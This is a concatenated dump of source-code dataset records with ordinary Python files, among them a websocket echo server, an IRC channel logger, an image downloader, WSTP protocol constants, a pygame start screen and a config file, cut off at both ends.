sys.exit()\n\n\n","sub_path":"flashbackscraper.py","file_name":"flashbackscraper.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"165634952","text":"\n#!/usr/bin/env python3\n\nimport asyncio\nimport websockets\nimport json\n\nasync def server(websocket, path):\n while True:\n # Get received data from websocket\n data = await websocket.recv()\n print (\"Received: \" + data)\n json_data = json.loads(data)\n if json_data.get('function') == 'echo':\n #echo back the first argument\n json_data['return'] = json_data['args'][0]\n elif json_data.get('function') == 'ask':\n #echo back the first argument\n json_data['return'] = input(json_data['args'][0])\n elif json_data.get('function') == 'throw':\n #throw the first argument\n json_data['throw'] = json_data['args'][0]\n elif not json_data.get('function') is None:\n json_data['throw'] = 'Unknown function : ' + json_data['function']\n\n # Send response back to client to acknowledge receiving message\n response = json.dumps(json_data)\n print (\"Responding: \" + response)\n await websocket.send(response)\n\n# Create websocket server\nstart_server = websockets.serve(server, \"localhost\", 5150)\n\n# Start and run websocket server forever\nasyncio.get_event_loop().run_until_complete(start_server)\nprint(\"Starting loop\")\nasyncio.get_event_loop().run_forever()","sub_path":"www/test/0.0.9/test/sockets/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"326511782","text":"from twisted.internet.task import LoopingCall\nfrom twisted.plugin import IPlugin\nfrom twisted.python.logfile import DailyLogFile\nfrom txircd.config import ConfigValidationError\nfrom txircd.module_interface import IModuleData, ModuleData\nfrom txircd.utils import CaseInsensitiveDictionary, now\nfrom zope.interface import implementer\nfrom fnmatch import fnmatchcase\nfrom typing import Any, Callable, Dict, List, Tuple\n\n@implementer(IPlugin, IModuleData)\nclass ChannelLog(ModuleData):\n\tname = \"ChannelLog\"\n\t\n\tdef actions(self) -> List[Tuple[str, int, Callable]]:\n\t\treturn [ (\"commandextra-PRIVMSG\", 1, self.logMsg),\n\t\t\t(\"commandextra-NOTICE\", 1, self.logNotice),\n\t\t\t(\"servercommandextra-PRIVMSG\", 1, self.logMsgServer),\n\t\t\t(\"servercommandextra-NOTICE\", 1, self.logNoticeServer),\n\t\t\t(\"join\", 1, self.logJoin),\n\t\t\t(\"remotejoin\", 1, self.logJoin),\n\t\t\t(\"leave\", 1, self.logLeave),\n\t\t\t(\"remoteleave\", 1, self.logLeave),\n\t\t\t(\"topic\", 1, self.logTopic),\n\t\t\t(\"modechanges-channel\", 1, self.logModeChanges) ]\n\t\n\tdef load(self) -> None:\n\t\tself.logFiles = CaseInsensitiveDictionary()\n\t\tself.cleanupProcess = LoopingCall(self.cleanLogFiles)\n\t\tself.cleanupProcess.start(600, now=False)\n\t\n\tdef unload(self) -> None:\n\t\tfor logFile in self.logFiles.values():\n\t\t\tlogFile.close()\n\t\tself.logFiles.clear()\n\t\tif self.cleanupProcess.running:\n\t\t\tself.cleanupProcess.stop()\n\t\n\tdef verifyConfig(self, config: Dict[str, Any]) -> None:\n\t\tif \"channel_log_directory\" in config:\n\t\t\tif not isinstance(config[\"channel_log_directory\"], str):\n\t\t\t\traise ConfigValidationError(\"channel_log_directory\", \"must be a string representing the directory\")\n\t\tif \"channel_log_channels\" in config:\n\t\t\tif not isinstance(config[\"channel_log_channels\"], list):\n\t\t\t\traise ConfigValidationError(\"channel_log_channels\", \"must be a list of channel masks\")\n\t\t\tfor channelNameMask in config[\"channel_log_channels\"]:\n\t\t\t\tif not isinstance(channelNameMask, str):\n\t\t\t\t\traise ConfigValidationError(\"channel_log_channels\", \"must be a list of channel masks\")\n\t\n\tdef cleanLogFiles(self) -> None:\n\t\tdeadChannelNames = {}\n\t\tfor channelName, logFile in self.logFiles.items():\n\t\t\tif channelName not in self.ircd.channels:\n\t\t\t\tdeadChannelNames[channelName] = logFile\n\t\tfor channelName, logFile in deadChannelNames.items():\n\t\t\tlogFile.close()\n\t\t\tdel self.logFiles[channelName]\n\t\n\tdef timestampPrefix(self) -> str:\n\t\tnowTime = now()\n\t\treturn \"[{}:{:02d}:{:02d}]\".format(nowTime.hour, nowTime.minute, nowTime.second)\n\t\n\tdef logLine(self, channel: \"IRCChannel\", line: str) -> None:\n\t\tline = \"{} {}\\n\".format(self.timestampPrefix(), line)\n\t\tif channel.name in self.logFiles:\n\t\t\tlogFile = self.logFiles[channel.name]\n\t\telse:\n\t\t\tif not self.shouldLogChannel(channel):\n\t\t\t\treturn\n\t\t\tlogFile = DailyLogFile(channel.name, self.ircd.config.get(\"channel_log_directory\", \"\"))\n\t\t\tself.logFiles[channel.name] = logFile\n\t\tif logFile.shouldRotate():\n\t\t\tlogFile.rotate()\n\t\tlogFile.write(line)\n\t\n\tdef shouldLogChannel(self, channel: \"IRCChannel\"):\n\t\tchannelNameMaskList = self.ircd.config.get(\"channel_list_channels\", [])\n\t\tif not channelNameMaskList:\n\t\t\treturn True\n\t\tchannelName = channel.name\n\t\tfor channelNameMask in channelNameMaskList:\n\t\t\tif fnmatchcase(channelName, channelNameMask):\n\t\t\t\treturn True\n\t\treturn False\n\t\n\tdef logMsg(self, user: \"IRCUser\", data: Dict[Any, Any]) -> None:\n\t\tif \"targetchans\" not in data:\n\t\t\treturn\n\t\tfor channel, message in data[\"targetchans\"].items():\n\t\t\tif message[:7] == \"\\x01ACTION\":\n\t\t\t\tmessage = message[8:]\n\t\t\t\tif message[-1] == \"\\x01\":\n\t\t\t\t\tmessage = message[:-1]\n\t\t\t\tself.logLine(channel, \"*{} {}\".format(user.nick, message))\n\t\t\t\tcontinue\n\t\t\tself.logLine(channel, \"<{}> {}\".format(user.nick, message))\n\t\n\tdef logNotice(self, user: \"IRCUser\", data: Dict[Any, Any]) -> None:\n\t\tif \"targetchans\" not in data:\n\t\t\treturn\n\t\tfor channel, message in data[\"targetchans\"].items():\n\t\t\tself.logLine(channel, \"--{}-- {}\".format(user.nick, message))\n\t\n\tdef logMsgServer(self, server: \"IRCServer\", data: Dict[Any, Any]) -> None:\n\t\tif \"tochan\" not in data:\n\t\t\treturn\n\t\tfromUser = data[\"from\"]\n\t\tchannel = data[\"tochan\"]\n\t\tmessage = data[\"message\"]\n\t\tif message[:7] == \"\\x01ACTION\":\n\t\t\tmessage = message[8:]\n\t\t\tif message[-1] == \"\\x01\":\n\t\t\t\tmessage = message[:-1]\n\t\t\tself.logLine(channel, \"*{} {}\".format(fromUser.nick, message))\n\t\telse:\n\t\t\tself.logLine(channel, \"<{}> {}\".format(fromUser.nick, message))\n\t\n\tdef logNoticeServer(self, server: \"IRCServer\", data: Dict[Any, Any]) -> None:\n\t\tif \"tochan\" not in data:\n\t\t\treturn\n\t\tself.logLine(data[\"tochan\"], \"--{}-- {}\".format(data[\"from\"].nick, data[\"message\"]))\n\t\n\tdef logJoin(self, channel: \"IRCChannel\", user: \"IRCUser\", fromServer: \"IRCServer\" = None) -> None:\n\t\tself.logLine(channel, \"> {} has joined {}\".format(user.nick, channel.name))\n\t\n\tdef logLeave(self, channel: \"IRCChannel\", user: \"IRCUser\", partType: str, typeData: Dict[str, Any]) -> None:\n\t\tif partType == \"QUIT\":\n\t\t\tself.logLine(channel, \"> {} has quit: {}\".format(user.nick, typeData[\"reason\"]))\n\t\telif partType == \"KICK\":\n\t\t\tself.logLine(channel, \"> {} has been kicked from {} by {}: {}\".format(user.nick, channel.name, typeData[\"user\"].nick if typeData[\"byuser\"] else typeData[\"server\"].name, typeData[\"reason\"]))\n\t\telse:\n\t\t\tif \"reason\" in typeData and typeData[\"reason\"]:\n\t\t\t\tself.logLine(channel, \"> {} has left {}: {}\".format(user.nick, channel.name, typeData[\"reason\"]))\n\t\t\telse:\n\t\t\t\tself.logLine(channel, \"> {} has left {}\".format(user.nick, channel.name))\n\t\n\tdef logTopic(self, channel: \"IRCChannel\", setter: str, source: str, oldTopic: str) -> None:\n\t\tself.logLine(channel, \"> {} changed the channel topic: {}\".format(source, channel.topic))\n\t\n\tdef logModeChanges(self, channel: \"IRCChannel\", source: str, sourceName: str, modeChanges: List[Tuple[bool, str, str, str, \"datetime\"]]) -> None:\n\t\tmodes = []\n\t\tparams = []\n\t\tlastAdding = None\n\t\tfor modeChangeData in modeChanges:\n\t\t\tif lastAdding != modeChangeData[0]:\n\t\t\t\tif modeChangeData[0]:\n\t\t\t\t\tmodes.append(\"+\")\n\t\t\t\t\tlastAdding = True\n\t\t\t\telse:\n\t\t\t\t\tmodes.append(\"-\")\n\t\t\t\t\tlastAdding = False\n\t\t\tmodes.append(modeChangeData[1])\n\t\t\tif modeChangeData[2]:\n\t\t\t\tparams.append(modeChangeData[2])\n\t\tmodeChangeStr = \"{} {}\".format(\"\".join(modes), \" \".join(params)) if params else \"\".join(modes)\n\t\tself.logLine(channel, \"> {} has set modes {}\".format(sourceName, modeChangeStr))\n\nchannelLog = ChannelLog()","sub_path":"txircd/modules/extra/channellog.py","file_name":"channellog.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"459880152","text":"\n__author__ = 'eduardo'\n\nimport csv\n\nimport matplotlib.pyplot as plt\n\n\ndef process_data(file):\n\n dictionary = dict()\n\n with open(file, 'r') as csvFile:\n reader = csv.DictReader(csvFile)\n\n for row in reader:\n validation = row['Validation']\n\n if validation == 'true':\n authority = row['Certificate Authority']\n\n if authority in dictionary:\n dictionary[authority] += 1\n else:\n dictionary[authority] = 1\n\n return dictionary\n\n\ndef plot_data(data):\n\n sorted_keys = sorted(data.iterkeys())\n values = []\n\n for key in sorted_keys:\n values.append(data[key])\n\n plt.axis(\"equal\")\n plt.title('Certificate Authority')\n plt.pie(values, labels=sorted_keys)\n\n # plt.savefig('authority.png')\n plt.show()\n\nif __name__ == '__main__':\n plot_data(process_data('test/output1.csv'))","sub_path":"plot/https/certificateAuthority.py","file_name":"certificateAuthority.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"565166019","text":"import os\nimport sys\nimport time\nimport urllib.request\nimport requests\nimport pymongo\nfrom configs import database_name, host_url, pic_root_folder\n\nTIMEOUTSEC = 300\n\n\ndef save_pic_from_url_wrapper(pic_url, root_folder=pic_root_folder):\n if False:\n pass\n else:\n pic_path = root_folder + pic_url\n pic_folder = os.path.dirname(pic_path)\n os.makedirs(pic_folder, exist_ok=True)\n if os.path.exists(pic_path):\n return\n print('Downloading: ' + pic_url)\n save_pic_from_url(host_url + pic_url, pic_path)\n\n\ndef save_pic_from_url(pic_url, pic_path, ref=host_url):\n try:\n f = open(pic_path, 'wb')\n content = requests.get(pic_url,\n headers={'referer': ref},\n timeout=TIMEOUTSEC).content\n f.write(content)\n f.close()\n except urllib.error.HTTPError as err:\n if err.code in [403, 404, 503, 504]:\n print(sys.exc_info())\n else:\n time.sleep(5)\n print(sys.exc_info())\n return False\n except:\n time.sleep(5)\n print(sys.exc_info())\n\n\ndef update_db_according_to_file():\n client = pymongo.MongoClient('localhost', 27017)\n db = client[database_name]\n cursor = db['pics'].find({'filePath': None}, no_cursor_timeout=True)\n for i in cursor:\n url = i['url']\n print(url)\n file_name = pic_root_folder + url\n if os.path.isfile(file_name):\n print(url)\n i['filePath'] = 1\n db['pics'].save(i)\n cursor.close()\n\n\ndef update_db_according_to_file_complete():\n client = pymongo.MongoClient('localhost', 27017)\n db = client[database_name]\n cursor = db['pics'].find(no_cursor_timeout=True)\n for i in cursor:\n url = i['url']\n print(url)\n file_name = pic_root_folder + url\n if os.path.isfile(file_name):\n i['filePath'] = 1\n else:\n i['filePath'] = None\n print('Not Found')\n db['pics'].save(i)\n cursor.close()\n\n\ndef download_all_pics_incremental():\n # update_db_according_to_file()\n\n client = pymongo.MongoClient('localhost', 27017)\n db = client[database_name]\n\n cursor = db['picSets'].find()\n cover_img_url_list = [i['coverImgUrl'] for i in cursor]\n total = len(cover_img_url_list)\n print('Total urls: ' + str(total))\n for cur, url in enumerate(cover_img_url_list):\n save_pic_from_url_wrapper(url)\n print('{}/{}, {}% complete. Finished downloading: {}'.format(\n cur + 1, total, format((cur+1)/total*100, '0.2f'), url))\n\n cursor = db['pics'].find({'filePath': None})\n pic_url_list = [i['url'] for i in cursor]\n total = len(pic_url_list)\n print('Total urls: ' + str(total))\n for cur, url in enumerate(pic_url_list):\n save_pic_from_url_wrapper(url)\n print('{}/{}, {}% complete. Finished downloading: {}'.format(\n cur + 1, total, format((cur+1)/total*100, '0.2f'), url))\n\n update_db_according_to_file()\n\nif __name__ == '__main__':\n # update_db_according_to_file_complete()\n pass\n","sub_path":"utils/down_pic.py","file_name":"down_pic.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"369022501","text":"'''\nmacros and typedefs goes here\n'''\nimport ctypes\n\n# === WSTP error codes from wstp.h\n\nWSEUNKNOWN =-1\nWSEOK = 0\nWSEDEAD = 1\nWSEGBAD = 2\nWSEGSEQ = 3\nWSEPBTK = 4\nWSEPSEQ = 5\nWSEPBIG = 6\nWSEOVFL = 7\nWSEMEM = 8\nWSEACCEPT = 9\nWSECONNECT =10\nWSECLOSED =11\nWSEDEPTH =12 # internal error\nWSENODUPFCN =13 # stream cannot be duplicated\n\nWSENOACK =15\nWSENODATA =16\nWSENOTDELIVERED =17\nWSENOMSG =18\nWSEFAILED =19\n\nWSEGETENDEXPR =20\nWSEPUTENDPACKET =21 # unexpected call of WSEndPacket\n # currently atoms aren't\n # counted on the way out so this error is raised only when\n # WSEndPacket is called in the midst of an atom\nWSENEXTPACKET =22\nWSEUNKNOWNPACKET =23\nWSEGETENDPACKET =24\nWSEABORT =25\nWSEMORE =26 # internal error\nWSENEWLIB =27\nWSEOLDLIB =28\nWSEBADPARAM =29\nWSENOTIMPLEMENTED =30\n\nWSEINIT =32\nWSEARGV =33\nWSEPROTOCOL =34\nWSEMODE =35\nWSELAUNCH =36\nWSELAUNCHAGAIN =37\nWSELAUNCHSPACE =38\nWSENOPARENT =39\nWSENAMETAKEN =40\nWSENOLISTEN =41\nWSEBADNAME =42\nWSEBADHOST =43\nWSERESOURCE =44 # a required resource was missing\nWSELAUNCHFAILED =45\nWSELAUNCHNAME =46\nWSEPDATABAD =47\nWSEPSCONVERT =48\nWSEGSCONVERT =49\nWSENOTEXE =50\nWSESYNCOBJECTMAKE =51\nWSEBACKOUT =52\nWSEBADOPTSYM =53\nWSEBADOPTSTR =54\nWSENEEDBIGGERBUFFER=55\nWSEBADNUMERICSID =56\nWSESERVICENOTAVAILABLE=57\nWSEBADARGUMENT =58\nWSEBADDISCOVERYHOSTNAME =59\nWSEBADDISCOVERYDOMAINNAME =60\nWSEBADSERVICENAME =61\nWSEBADDISCOVERYSTATE =62\nWSEBADDISCOVERYFLAGS =63\nWSEDISCOVERYNAMECOLLISION =64\nWSEBADSERVICEDISCOVERY =65\nWSELAST=WSESERVICENOTAVAILABLE\n\nWSETRACEON = 996\nWSETRACEOFF = 997\nWSEDEBUG = 998\nWSEASSERT = 999 # an internal assertion failed\nWSEUSER =1000 # start of user defined errors\n\n# === WSTP tokens, adapted from wstp.h\n\nREALBIT = 4\nREAL_MASK = (1 << REALBIT)\nXDRBIT = 5\nXDR_MASK = (1 << XDRBIT)\nBINARYBIT = 7\nBINARY_MASK = (1 << BINARYBIT)\nSIZEVARIANTBIT = 6\nSIZEVARIANT_MASK = (1 << SIZEVARIANTBIT)\n\nWSTKOLDINT = ord('I') # 73 Ox49 01001001 integer leaf node\nWSTKOLDREAL= ord('R') # 82 Ox52 01010010 real leaf node\n\nWSTKFUNC =ord('F') # 70 Ox46 01000110 non-leaf node\n\nWSTKERROR = 0 # bad token\nWSTKERR = 0 # bad token\n\n# text token bit patterns: 0010x01x --exactly 2 bits worth chosen to make things somewhat readable\nWSTKSTR =ord('\"') # 34 0x22 00100010\nWSTKSYM =ord('#') # 35 0x23 # 00100011 octal here as hash requires a trigraph\n\nWSTKOPTSYM =ord('O') # 79 00101010\nWSTKOPTSTR =ord('Q') # 81 01010001\n\nWSTKREAL =ord('*') # 42 0x2A 00101010\nWSTKINT =ord('+') # 43 0x2B 00101011\n# The following defines are for internal use only\nWSTKPCTEND =ord(']') # at end of top level expression\nWSTKAPCTEND=ord('\\n') # at end of top level expression\nWSTKEND =ord('\\n')\nWSTKAEND =ord('\\r')\nWSTKSEND =ord(',')\n\nWSTKCONT =ord('\\\\')\nWSTKELEN =ord(' ')\n\nWSTKNULL =ord('.')\nWSTKOLDSYM =ord('Y') # 89 0x59 01011001\nWSTKOLDSTR =ord('S') # 83 0x53 01010011\n\nWSTKPACKED =ord('P') # 80 0x50 01010000\nWSTKARRAY =ord('A') # 65 0x41 01000001\nWSTKDIM =ord('D') # 68 0x44 01000100\n\nWSTK_INVALID = 155\n\nWSTK_8BIT_SIGNED_2sCOMPLEMENT_INTEGER = 160\nWSTK_8BIT_UNSIGNED_2sCOMPLEMENT_INTEGER = 161\nWSTK_8BIT_UNSIGNED_INTEGER = WSTK_8BIT_UNSIGNED_2sCOMPLEMENT_INTEGER\n\nWSTK_16BIT_SIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER = 162\nWSTK_16BIT_UNSIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER = 163\nWSTK_16BIT_UNSIGNED_BIGENDIAN_INTEGER = WSTK_16BIT_UNSIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER\n\nWSTK_32BIT_SIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER = 164\nWSTK_32BIT_UNSIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER = 165\nWSTK_32BIT_UNSIGNED_BIGENDIAN_INTEGER = WSTK_32BIT_UNSIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER\n\nWSTK_64BIT_SIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER = 166\nWSTK_64BIT_UNSIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER = 167\nWSTK_64BIT_UNSIGNED_BIGENDIAN_INTEGER = WSTK_64BIT_UNSIGNED_2sCOMPLEMENT_BIGENDIAN_INTEGER\n\nWSTK_16BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER =226\nWSTK_16BIT_UNSIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER=227\nWSTK_16BIT_UNSIGNED_LITTLEENDIAN_INTEGER=WSTK_16BIT_UNSIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_32BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER =228\nWSTK_32BIT_UNSIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER=229\nWSTK_32BIT_UNSIGNED_LITTLEENDIAN_INTEGER=WSTK_32BIT_UNSIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_64BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER =230\nWSTK_64BIT_UNSIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER=231\nWSTK_64BIT_UNSIGNED_LITTLEENDIAN_INTEGER=WSTK_64BIT_UNSIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\n\nWSTK_BIGENDIAN_IEEE754_SINGLE =180\nWSTK_BIGENDIAN_IEEE754_DOUBLE =182\nWSTK_BIGENDIAN_128BIT_DOUBLE =184\nWSTK_LITTLEENDIAN_IEEE754_SINGLE =244\nWSTK_LITTLEENDIAN_IEEE754_DOUBLE =246\nWSTK_LITTLEENDIAN_128BIT_DOUBLE =248\n\n'''\nWSTK_CSHORT_P 193\nWSTK_CINT_P 194\nWSTK_CLONG_P 195\nWSTK_CFLOAT_P 209\nWSTK_CDOUBLE_P 210\nWSTK_CLONGDOUBLE_P 211\n'''\n\n# portable ?\nWSTK_CSHORT_P = (( BINARY_MASK | SIZEVARIANT_MASK | 1))\nWSTK_CINT_P = (( BINARY_MASK | SIZEVARIANT_MASK | 2))\nWSTK_CLONG_P = (( BINARY_MASK | SIZEVARIANT_MASK | 3))\nWSTK_CFLOAT_P = (( BINARY_MASK | SIZEVARIANT_MASK | REAL_MASK | 1))\nWSTK_CDOUBLE_P = (( BINARY_MASK | SIZEVARIANT_MASK | REAL_MASK | 2))\nWSTK_CLONGDOUBLE_P= (( BINARY_MASK | SIZEVARIANT_MASK | REAL_MASK | 3))\n\nWSTK_64BIT_LITTLEENDIAN_STRUCTURE=196\nWSTK_64BIT_BIGENDIAN_STRUCTURE =197\nWSTK_128BIT_EXTENDED =158\nWSTK_128BIT_LONGDOUBLE =158\nWSTK_96BIT_HIGHPADDED_INTEL_80BIT_EXTENDED=218\nWSTK_INTEL_80BIT_EXTENDED=216\n\nWSTK_CUCHAR =WSTK_8BIT_UNSIGNED_INTEGER\nWSTK_WSUCHAR=WSTK_8BIT_UNSIGNED_INTEGER\n\n#if LINUX_x86_64\nWSTK_CSHORT =WSTK_16BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_CINT =WSTK_32BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_CLONG =WSTK_64BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_CINT64 =WSTK_64BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_CSIZE_T =WSTK_64BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_CFLOAT =WSTK_LITTLEENDIAN_IEEE754_SINGLE\nWSTK_CDOUBLE =WSTK_LITTLEENDIAN_IEEE754_DOUBLE\nWSTK_CLONGDOUBLE =WSTK_LITTLEENDIAN_128BIT_DOUBLE\nWSTK_WSSHORT =WSTK_16BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_WSINT =WSTK_32BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_WSLONG =WSTK_64BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_WSINT64 =WSTK_64BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_WSSIZE_T =WSTK_64BIT_SIGNED_2sCOMPLEMENT_LITTLEENDIAN_INTEGER\nWSTK_WSFLOAT =WSTK_LITTLEENDIAN_IEEE754_SINGLE\nWSTK_WSDOUBLE =WSTK_LITTLEENDIAN_IEEE754_DOUBLE\nWSTK_WSLONGDOUBLE =WSTK_LITTLEENDIAN_128BIT_DOUBLE\n# TODO add windows and darwin version of above section\n\nWSLENGTH_DECODER = 1<<16\nWSTKPACKED_DECODER = 1<<17\nWSTKARRAY_DECODER = 1<<18\nWSTKMODERNCHARS_DECODER= 1<<19\nWSTKNULLSEQUENCE_DECODER=0\nWSTKALL_DECODERS = (\n WSLENGTH_DECODER | WSTKPACKED_DECODER |\n WSTKARRAY_DECODER | WSTKMODERNCHARS_DECODER |\n WSTKNULLSEQUENCE_DECODER)\nWSTK_FIRSTUSER=0x30 # user token\nWSTK_LASTUSER =0x3F\n\n# ==== WSTP link options, renamed \"ML\" to \"WSLO\"\nWSLODefaultOptions = 0x00000000\nWSLONetworkVisible = 0x00000000\nWSLOLocallyVisible = 0x00000001\nWSLOInternetVisible = 0x00000002\n\nWSLOBrowse = 0x00000000\nWSLODontBrowse = 0x00000010\n\nWSLONonBlocking = 0x00000000\nWSLOBlocking = 0x00000020\n\nWSLOInteract = 0x00000000\nWSLODontInteract = 0x00000100\n\nWSLOForceYield = 0x00000200\nWSLOUseIPV6 = 0x00010000\nWSLOUseIPV4 = 0x00020000\n\nWSLOUseNewTCPIPConnection = 0x00100000\nWSLOUseOldTCPIPConnection = 0x00200000\nWSLOUseUUIDTCPIPConnection = 0x00000004\n\nWSLOUseAnyNetworkAddress = 0x00000008\n\n\n# ==== macro functions\n\nWSTK__IS_TEXT = lambda tok: ((tok & 0x00F6) == 0x0022)\nWSNE__IS_BINARY = lambda tok: ((tok) & BINARY_MASK)\nWSNE__IS_REAL = lambda tok: ((tok) & REAL_MASK)\nWSNE__TEXT_TOKEN = lambda tok: (WSTKREAL if WSNE__IS_REAL( tok) else WSTKINT)\n\n# ==== c typedefs\n\nWSENVPARAM_t = ctypes.c_void_p\nWSENV_t = ctypes.c_void_p\nWSTOKEN_t = ctypes.c_int\nWSLINK_t = ctypes.c_void_p\nWSLINKCALLBACK_t = ctypes.CFUNCTYPE(ctypes.c_int, WSLINK_t, ctypes.c_void_p)\nWSERRNO_t = ctypes.c_int\nWSLINKSERVER_t = ctypes.c_void_p\nWSLINKSERVERCALLBACK_t = ctypes.CFUNCTYPE(None, WSLINKSERVER_t, WSLINK_t)\nWSMARK_t = ctypes.c_void_p\nARRAY_METER_t = ctypes.c_void_p\n","sub_path":"wstp/wsdefs.py","file_name":"wsdefs.py","file_ext":"py","file_size_in_byte":9261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"266416265","text":"from sys import argv\nimport gamefunctions\nimport requests\nimport bs4\nimport re\n\n# Pirated game update checker. Stick references as needed.\ngameList = [\"OxygenNotIncluded\", \"Factorio\", \"ACEO\", \"BeamNG\", \"CitiesSkylines\", \"Civilisation\"]\n\ndef GetHTTP(hyperlink):\n response = requests.get(hyperlink)\n if response.status_code != 200:\n print(\"Response did not return 200. Returned \" + response.status_code)\n print(\"sendhelp_pls\")\n exit\n \n properText = bs4.BeautifulSoup(response.text, features=\"lxml\")\n properText.prettify()\n return properText\n\ndef readversion(fileLocation, whatToSub, whetherToSub):\n try: file = open(fileLocation, \"r\").read()\n except: return 0\n\n if whetherToSub:\n characters = \"[\" + whatToSub + \"]\"\n file = re.sub(characters, \"\", file)\n \n return file\n\ndef checkversion(gameName, onlineList, localVersion, numberType):\n convertedList = []\n convertedlocalVersion = 0\n isOutdated = False\n\n if numberType == int:\n for numbers in onlineList:\n convertedList.append(int(numbers))\n convertedlocalVersion = int(localVersion)\n \n if numberType == float:\n for numbers in onlineList:\n convertedList.append(float(numbers))\n convertedlocalVersion = float(localVersion)\n\n for soup in convertedList:\n if soup > convertedlocalVersion:\n print(gameName + \" is out-of-date! Local version is: \" + str(localVersion))\n print(\"Latest version should be: \" + onlineList[0])\n isOutdated = True\n break\n \n if not isOutdated:\n print(gameName + \" is up-to-date!\")\n\ndef main(argument):\n for games in gameList:\n if argument == games:\n command = str(\"gamefunctions.\" + games + \"()\")\n exec(command)\n \n if argument == \"--help\":\n print(\"\\nValid arguments:\")\n print(gameList)\n\nif __name__ == \"__main__\":\n if len(argv) == 2: main(argv[1])\n else: main(str(input(\"Valid arguments:\\n\" + str(gameList) + \"\\n\")))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"336909220","text":"import pygame\n\n\ndef start_screen(window, WIDTH, HEIGHT, FPS):\n intro_text = [\"ЗАСТАВКА\", \"\",\n \"Правила игры\",\n \"Если в правилах несколько строк,\",\n \"приходится выводить их построчно\"]\n\n fon = pygame.transform.scale(pygame.image.load('Sprites/bug-happy.png'), (WIDTH, HEIGHT))\n window.blit(fon, (0, 0))\n font = pygame.font.Font(None, 30)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, 1, pygame.Color('black'))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n window.blit(string_rendered, intro_rect)\n\n\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN or event.type == pygame.MOUSEBUTTONDOWN:\n return 1# начинаем игру\n pygame.display.flip()\n pygame.time.Clock().tick(FPS)\n\n pygame.quit()","sub_path":"proekt_2021/start_game.py","file_name":"start_game.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"366618581","text":"import numpy as np\n\ndef make_pinwheel_data(radial_std, tangential_std, num_classes, num_per_class, rate):\n # code from Johnson et. al. (2016)\n rads = np.linspace(0, 2*np.pi, num_classes, endpoint=False)\n\n np.random.seed(1)\n\n features = np.random.randn(num_classes*num_per_class, 2) \\\n * np.array([radial_std, tangential_std])\n features[:,0] += 1.\n labels = np.repeat(np.arange(num_classes), num_per_class)\n\n angles = rads[labels] + rate * np.exp(features[:,0])\n rotations = np.stack([np.cos(angles), -np.sin(angles), np.sin(angles), np.cos(angles)])\n rotations = np.reshape(rotations.T, (-1, 2, 2))\n\n feats = 10 * np.einsum('ti,tij->tj', features, rotations)\n\n data = np.random.permutation(np.hstack([feats, labels[:, None]]))\n\n return data[:, 0:2], data[:, 2].astype(np.int) \n","sub_path":"pinwheel.py","file_name":"pinwheel.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"616989014","text":"api = {\n 'key': 'Ap1K@ti0n',\n 'secret': 'SXQxc1N1cGVyNTNjJWV0Cg',\n 'version': '1.0.0'\n}\n\nservice = {\n 'host': '127.0.0.1',\n 'port': 5002,\n 'build_base': False,\n 'heroku': False\n}\n\ndata = {\n 'path': './data',\n 'features': {\n 'keyboard': ['pp', 'wp', 'ds', 'dst', 'bs'],\n 'mouse': ['cc', 'ac', 'cp', 'dc']\n },\n 'classes': ['name'],\n 'estimators': 100\n}\n\nlog = {\n 'file': './log/server.log',\n 'format': '%(levelname) -5s %(asctime)s 